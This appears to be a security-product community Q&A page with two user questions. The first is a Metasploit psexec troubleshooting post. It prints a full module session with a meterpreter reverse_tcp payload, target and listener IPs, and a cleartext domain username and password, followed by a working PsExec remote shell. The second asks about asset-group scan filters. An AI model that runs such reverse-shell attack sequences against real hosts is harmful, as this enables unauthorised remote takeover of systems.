Knowledge Base

Questions

1

psexec exploit in metasploit

Hi All,

Please see the error message when running the exploit. It does not seem to get past authentication.

    msf exploit(windows/smb/psexec) > use exploit/windows/smb/psexec
    msf exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
    PAYLOAD => windows/x64/meterpreter/reverse_tcp
    msf exploit(windows/smb/psexec) > set RHOST 139.49.19.13
    RHOST => 139.49.19.13
    msf exploit(windows/smb/psexec) > set LHOST 139.49.153.201
    LHOST => 139.49.153.201
    msf exploit(windows/smb/psexec) > set SMBDomain CORP
    SMBDomain => CORP
    msf exploit(windows/smb/psexec) > set SMBUser "localadmin"
    SMBUser => localadmin
    msf exploit(windows/smb/psexec) > set SMBPass "MrPassw0rd"
    SMBPass => MrPassw0rd
    msf exploit(windows/smb/psexec) > set LPORT 4444
    LPORT => 443
    msf exploit(windows/smb/psexec) > exploit
    [*] Started reverse TCP handler on 139.49.153.201:4444
    [*] 139.49.19.13:445 - Connecting to the server...
    [*] 139.49.19.13:445 - Authenticating to 139.49.19.13:445| as user 'CORP\localadmin'...
    [-] 139.49.19.13:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: An existing connection was forcibly closed by the remote host.
    [*] Exploit completed, but no session was created.
    msf exploit(windows/smb/psexec) > version
    Framework: 4.16.47-dev-b4e392e32287d35c3358e5937ba4e09d22ea813b
    Console : 4.16.47-dev-b4e392e32287d35c3358e5937ba4e09d22ea813b

I tested authentication by running the Sysinternals PsExec outside of Metasploit. PsExec was successful.

    C:\Users\Administrator>SysinternalsSuite\PsExec.exe \\139.49.19.13 -u CORP\localadmin cmd
    PsExec v2.2 - Execute processes remotely
    Copyright (C) 2001-2016 Mark Russinovich
    Sysinternals - www.sysinternals.com
    Password:
    Microsoft Windows [Version 6.1.7601]
    Copyright (c) 2009 Microsoft Corporation. All rights reserved.
    C:\Windows\system32>whoami
    CORP\localadmin

I get the same result using the psexec_psh exploit. Please give advice. Thanks.

Regards,
AA

Posted by aa 8 months ago

3

AD connection, "Last scan date" in DAG and no devices returned

Hi, I've got an issue with a DAG outcome.

I have a site_A populated with devices by an AD connection. It works well: it populates site_A with names and OS, but not with the IP addresses of the devices. Understood, I need to do discovery to get IPs. I have no scans scheduled for site_A, as it only serves as the AD connection population target.

Then I have a DAG which filters the devices from site_A based on this filter:

    Site name - is - "site_A"
    Last scan date - earlier than - 1 day

(1 day is for testing only; in production I will have 30 or so.)

The problem is that if site_A has just been populated with fresh new devices from the AD connection, the DAG won't return any devices regardless of the "last scan date" filter condition setting. I've tried both complementary options: (Last scan date - earlier than - 1 day) and (Last scan date - within the last - 1 day). The DAG just doesn't show any devices from site_A. When I delete the second condition with "last scan date" and keep only the "site name..." condition, the DAG correctly returns all the devices in site_A. I have also waited one, two and three days to check if days play any role in generating the DAG, but they obviously don't, as I have been getting the same results each day.

Am I doing anything wrong? Can anyone help?

My aim is to scan the devices from site_A in small portions every day, so I thought I would manually run a scan for a small portion of devices each day until all of them are scanned, and then let a site based on the DAG be scanned every day on schedule. With the condition "Last scan date - earlier than - 30 days ago" in the DAG, the daily scans will do only a small portion of devices which have not been scanned within the last 30 days, forever. Any better idea how to achieve that is also welcome. Thanks.

Posted by Jiri Dohnal 8 months ago